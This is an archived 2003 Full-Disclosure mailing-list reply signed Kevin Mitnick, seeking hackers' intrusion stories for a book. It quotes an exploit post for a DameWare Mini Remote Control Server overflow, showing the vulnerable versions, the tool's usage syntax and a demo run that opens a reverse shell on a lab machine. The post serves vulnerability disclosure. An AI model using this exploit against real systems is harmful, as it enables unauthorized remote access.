RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

From: Kevin Mitnick (kmitnick_at_defthi.com)
Date: 12/20/03

  • Next message: Gregory A. Gilliss: "Re: [Full-Disclosure] 13 NASA Servers Hacked"
    To: "'Adik'" <netninja@hotmail.kg>, <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
    Date: Fri, 19 Dec 2003 15:30:35 -0800
    
    

    Hi all!

    I'm sorry for my absence from the list for the past few months, but I have
    been very busy traveling outside the US, and my mail account was
    experiencing problems. Now that I am receiving the messages again, I have
    been playing "catch up," by reading the old posts.

    I do have some good news, and was hoping that some of you might be able to
    assist me. I have been commissioned by Wiley & Sons to write a second book,
    which is tentatively titled, "The Art of Intrusion." This book will
    chronicle detailed accounts of real, untold hacks by the perpetrators who
    did it, and I will provide a security analysis and described how the attack
    could be mitigated/prevented in today's environment. I am going to tell the
    story from the perpetrator's stance, not just from research obtained from
    law enforcement officials and records.

    I am looking for former/retired hackers that would be willing to tell me the
    details of their sexiest hack. I am not interested in the run-of-the-mill
    attacks such as, exploiting RPC DCOM, but rather creative ones that
    incorporated technical, physical and/or social engineering aspects.

                     

    I am offering $500 for the most provocative story that makes it into the
    book, and if the person wishes, we can protect their anonymity by the use of
    a handle. All contributors selected for the book, will receive a copy of
    both books autographed by the authors.

    I should have more information up on FreeKevin.com today, as well as
    DefensiveThinking.com. If someone would like to contact me with a story or
    a possible lead on a storyteller, please write to me at
    hacks@defensivethinking.com, or call at (310)689-7229. I would appreciate
    any assistance you can offer.

    All my best,

     

    Kevin Mitnick

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Adik
    Sent: Friday, December 19, 2003 8:38 AM
    To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com
    Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
    Overflow Exploit

    DameWare Mini Remote Control Server Exploit

    C:\xploits\dmware>dmware

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by Adik netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

     Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
     eg: dmware 10.0.0.1 6129 10.0.0.2 21

    C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

            ...oO DameWare Remote Control Server Overflow Exploit Oo...

                    -( by Adik netmaniac[at]hotmail.KG )-

     - Versions vulnerable: <= DWRCS 3.72.0.0
     - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

    [*] Target IP: 192.168.63.130 Port: 6129
    [*] Local IP: 192.168.63.1 Listening Port: 53

    [*] Initializing sockets... [ OK ]
    [*] Binding to local port: 53... [ OK ]
    [*] Setting up a listener... [ OK ]

     OS Info : WIN2000 [ver 5.0.2195]
     SP String : Service Pack 3

     EIP: 0x77db912b (advapi32.dll)

    [*] Constructing packet for WIN 2000 SP: 3... [ OK ]
    [*] Connecting to 192.168.63.130:6129... [ OK ]
    [*] Packet injected!
    [*] Connection request accepted: 192.168.63.130:1056
    [*] Dropping to shell...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>exit
    exit
    [x] Connection closed.

    C:\xploits\dmware>

    ------
    cheerz,

    Adik

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Gregory A. Gilliss: "Re: [Full-Disclosure] 13 NASA Servers Hacked"

    Relevant Pages

    • [NT] DameWare Mini-RC Shatter (Exploit)
      ... DameWare Mini Remote Control Server runs on the users desktop as SYSTEM. ... Dameware Development has repaired all current known vulnerabilities. ...
      (Securiteam)
    • [Full-disclosure] Dameware critical hole
      ... DameWare Mini Remote Control Client Agent Service ... DameWare Mini Remote Control is "A lightweight remote control intended primarily ... By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP. ...
      (Full-Disclosure)